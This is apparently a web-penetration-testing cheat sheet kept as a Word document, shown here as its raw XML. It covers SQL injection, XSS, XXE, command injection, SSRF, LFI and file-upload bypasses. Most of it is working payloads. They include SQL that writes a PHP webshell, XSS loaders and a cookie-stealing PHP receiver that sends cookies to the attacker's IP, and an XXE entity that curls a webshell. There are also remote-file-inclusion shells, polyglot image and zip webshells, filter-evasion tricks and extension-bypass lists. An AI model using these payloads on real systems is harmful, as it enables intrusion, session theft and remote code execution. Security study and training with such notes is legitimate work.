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c1pmdu9pvqj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a8siumvyqmr" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Free vulns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anti-CSRF tokens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Any insecure cookies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if any website is HTTP and not HTTPS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Self signed certificate on any public websites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MFA in websites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WAF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enum through failed logins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kdh7eldofcpo" w:id="2"/>
      <w:bookmarkEnd w:id="2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Directory enumeration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Subdomain/vhost enumeration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Look in the inspect element and scripts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cookies/local storage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Parameter fuzz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SQLi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XXE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Command Injection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SSTI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SSRF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LFI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File Upload Vulnerabilities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j6qjhrllkull" w:id="3"/>
      <w:bookmarkEnd w:id="3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e8793u9fcxsm" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi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if vulnerable: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  <w:t xml:space="preserve">Try quotes/comments/control characters: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‘ ` “ ; , -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D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Sqlmap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Sqlmap how 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 burp to save a whole request to req.txt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-r req.txt to specify a text file with the request in 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--level=(1 through 5) to determine what level of complexity to use for the testing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--risk=(1 through 3) to determine risk of tests to perform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--batch to auto choose yes for all prompts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not using request can also be done by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-u to specify url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Run sqlmap -h to see more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 boolean injection only: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python3</w:t>
      </w:r>
      <w:hyperlink r:id="rId7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u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">sqlmap.py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-u ws://soc-player.soccer.htb:9091 --data '{"id":"*"}' --technique=B --risk=3 --level=5 --batch --dbs --threads 10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If vulnerable (causes an error, etc.):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Try actual injections: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‘ OR 1=1; -- -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Query tables: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UNION select 1,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.TABLES-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Pad the output with as many 1,1,1 etc. as you need to prevent column mismatch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Query columns from table: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UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'--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Make sure to replace the table here (“credentials”)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Query user privileges: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UNION SELECT 1,grantee,privilege_type FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- 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all variables: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UNION SELECT 1,1,variable_name, variable_value FROM information_schema.global_variables; -- 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you see “secure_file_priv”, if it’s empty you can write anywhere, otherwise it specifies the list of directories you can access. NULL disables file writing/reading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Reading and writing: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UNION SELECT '','','','',LOAD_FILE("/etc/apache2/apache2.conf"); -- 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UNION SELECT '','','','',"&lt;?php system($_REQUEST[0]); ?&gt;" INTO OUTFILE "/var/www/html/dashboard/shell.php" -- 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uwzqnmlhee9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47aaww6gfo3" w:id="6"/>
      <w:bookmarkEnd w:id="6"/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&lt;script&gt;alert(window.origin)&lt;/script&gt;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&lt;plaintext&gt;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&lt;script&gt;print()&lt;/script&gt;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&lt;img src="" onerror=alert(1)&gt;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Can try entering input into text field, then afterwards inspect elementing to see how it is shown on the webpage to try to determine if the website is vulnerable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 blind XSS, we will have to call our own server to see if it works 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&lt;script src="http://OUR_IP/script.js"&gt;&lt;/script&gt;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&lt;script src=http://OUR_IP&gt;&lt;/script&gt;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'&gt;&lt;script src=http://OUR_IP&gt;&lt;/script&gt;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"&gt;&lt;script src=http://OUR_IP&gt;&lt;/script&gt;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javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')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&lt;script&gt;function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();&lt;/script&gt;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&lt;script&gt;$.getScript("http://OUR_IP")&lt;/script&gt;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XSS can be used to steal cookies from users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index.php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&lt;?php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(isset($_GET['c'])) {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$list = explode(";", $_GET['c']);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foreach ($list as $key =&gt; $value) {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$cookie = urldecode($value);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$file = fopen("cookies.txt", "a+");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fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");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fclose($file);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mkdir /tmp/tmpserver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/tmp/tmpserver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php -S 0.0.0.0:80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 7.4.15 Development Server (http://0.0.0.0:80) started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SCRIPT.JS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document.location='http://OUR_IP/index.php?c='+document.cookie;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new Image().src='http://OUR_IP/index.php?c='+document.cookie;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(steal cookies)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After finding XSS we can use it to steal cookies by doing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&lt;script src=http://OUR_IP/script.js&gt;&lt;/script&gt;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ewbf9s2jo8c9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tp0eonrrcgyc" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXE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If we see an XML document being sent in the burp request, we can define a new element at the top ex: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&lt;!DOCTYPE email [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&lt;!ENTITY company “Inlane Freight”&gt;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then try using our defined entity by putting &amp;company; and see if the value is replaced in the output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 LFI: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&lt;!DOCTYPE email [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&lt;!ENTITY company SYSTEM “file:///etc/passwd”&gt;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To view special characters use php filter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&lt;!DOCTYPE email [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&lt;!ENTITY company SYSTEM “php://filter/convert.base64-encode/resource=index.php”&gt;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 curl a webshell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&lt;!DOCTYPE email [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&lt;!ENTITY company SYSTEM “expect://curl$IFS-O$IFS’OUR_IP/shell.php’”&gt;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]&gt;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Advanced File Disclosure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&lt;!DOCTYPE email [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&lt;!ENTITY % begin "&lt;![CDATA["&gt; &lt;!-- prepend the beginning of the CDATA tag --&gt;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&lt;!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php"&gt; &lt;!-- reference external file --&gt;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&lt;!ENTITY % end "]]&gt;"&gt; &lt;!-- append the end of the CDATA tag --&gt;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&lt;!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd"&gt; &lt;!-- reference our external DTD --&gt;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%xxe;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]&gt; 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udt0l9fwtdq5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jxc4pawos9ql" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Injection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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bypass Spaces:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Use tabs instead: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%09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Use IFS instead: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($IFS)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Use bash brace expansion which adds space between args automatically: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{ls,-la}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Bypass Slashes or Backslashes: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Take substring of environment variable ex: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${PATH:0:1}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Bypass semicolon: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${LS_COLORS:10:1}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On windows cmd to get a / the same technique can be done, ex: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%HOMEPATH:~6,-11%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On powershell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$env:HOMEPATH[0]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Another method could be to shift characters, ex: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$(tr ‘!-}’ ‘”-~’&lt;&lt;&lt;[)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Bypass Blacklisted Commands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Obfuscate our commands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W'h'o'am'i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Linux only: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who$@ami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W\ho\am\i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Windows only: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who^ami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$(tr "[A-Z]" "[a-z]"&lt;&lt;&lt;"WhOaMi") (case manipulation)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$(rev&lt;&lt;&lt;'imaohw') (reversed)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iex "$('imaohw'[-1..-20] -join '')" (windows)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Encoding too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echo -n 'cat /etc/passwd | grep 33' | base64 (encode payload)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bash&lt;&lt;&lt;$(base64 -d&lt;&lt;&lt;Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)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t7dm0qypjngx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5z49zbxno5o9" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSTI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Payload to test: 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${{&lt;%[%'"}}%\.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To determine templating engine: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s3h6t9vv3w9y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pxo69oy1mdh6" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF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Fuzz for other machines on the network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ffuf -w wordlist -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=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http://dateserver.htb/FUZZ.php&amp;date=2024-01-01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Try for LFI with URL schemes like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file:///etc/passwd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Try to read source code for current website with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http://127.0.0.1/index.php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These methods only work for get requests, to send post requests use Gopher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n1i6wf3p75jz" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI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First try basic ../../.. Technique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http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=../../../../etc/passwd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http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=/../../../etc/passwd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If that fails, try to bypass common preventions like replacing ../ with an empty string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http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=....//....//....//....//etc/passwd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Other common bypasses    ..././     ....\/      ....////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If a website allows us to upload something like a profile picture and the path to the profile picture uses are name we can try and do LFI by changing our username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 . /profile/$username/avatar.png, set username to ../../../etc/passwd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Encoding, can use burp to encode our payload if part of it is getting filtered (like if . is filtered)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&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64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Can also double encode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May have to fuzz for the approved path and then bypass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&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=./languages/../../../../etc/passwd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Can bypass appended extensions on some older php versions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echo -n "non_existing_directory/../../../etc/passwd/" &amp;&amp; for i in {1..2048}; do echo -n "./"; done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non_existing_directory/../../../etc/passwd/./././&lt;SNIP&gt;././././ (GOES OVER LIMIT)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Null bytes! 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../../../../etc/passwd%00.php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Source code disclosure, We can base64 encode the source code so it isnt rendered allowing us to read it. Need php filter wrapper.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http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=php://filter/read=convert.base64-encode/resource=config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echo 'PD9waHAK...SNIP...KICB9Ciov' | base64 -d (decode)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Abuse php data wrapper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echo '&lt;?php system($_GET["cmd"]); ?&gt;' | base64 (get base64 to inject)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http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&amp;cmd=id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curl -s -X POST --data '&lt;?php system($_GET["cmd"]); ?&gt;' "http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=php://input&amp;cmd=id" | grep uid (for POST, uses input)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Abusing php expect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curl -s "http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=expect://id"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Remote file inclusion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http://127.0.0.1:80/index.php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LEADS TO RCE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echo '&lt;?php system($_GET["cmd"]); ?&gt;' &gt; shell.php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python3 -m http.server &lt;LISTENING_PORT&gt;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http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=http://&lt;OUR_IP&gt;:&lt;LISTENING_PORT&gt;/shell.php&amp;cmd=id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LFI and File Uploads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echo 'GIF8&lt;?php system($_GET["cmd"]); ?&gt;' &gt; shell.gif (malicious image)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Upload image then use LFI to run it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http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=./profile_images/shell.gif&amp;cmd=id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Using zip wrapper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echo '&lt;?php system($_GET["cmd"]); ?&gt;' &gt; shell.php &amp;&amp; zip shell.jpg shell.php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http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=zip://./profile_images/shell.jpg%23shell.php&amp;cmd=id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Log Poisoning, Need execute perms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PHPSESID stored in/var/lib/php/sessions/ or C:\Windows\Temp\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/var/lib/php/sessions/sess_el4ukv0kqbvoirg7nkp4dncpk3. Where sess_{cookie}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http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd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Can control page parameter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http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=session_poisoning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http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd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Replace with webshell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http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E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http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=/var/lib/php/sessions/sess_ojnqukddhrk9579081fic19f6j&amp;cmd=id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pfbwbqmo3pup" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File upload vulnerabilities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Whenever there’s a way to upload a file, check for file upload vulnerabilities.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Try modifying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 header in Burp Suite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Otherwise modifying the type in the request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If the file extension works under a blacklist, you may be able to e.g.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.php5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.php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Some more attempts (mostly from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SecLists</w:t>
        </w:r>
      </w:hyperlink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'phpinfo.""gif'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'phpinfo."gif'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"phpinfo.''gif"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"phpinfo.'gif"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phpinfo.jpg.php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phpinfo.php.jpg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phpinfo.php.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phpinfo.php-1.gif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phpinfo.php-2.gif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phpinfo.php3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phpinfo.php4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phpinfo.php5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phpinfo.php7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'phpinfo.php.""gif'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'phpinfo.php."gif'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"phpinfo.php.''gif"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"phpinfo.php.'gif"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phpinfo.phpt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'phpinfo.php;.txt'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phpinfo.pht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phpinfo.phtml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phpinfo.txt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phpinfo%2Ephp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phpinfo.php;png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phpinfo.php%00.png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phpinfo.p.phphp </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- ends in `.php` once you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.replace("php",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8nuuqkb4058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ateserver.htb/FUZZ.php&amp;date=2024-01-01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://127.0.0.1:80/index.php" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/index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github.com/danielmiessler/SecLists/tree/master/Payload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qlmapproject/sqlmap" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sqlmap.py/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sqlmap.p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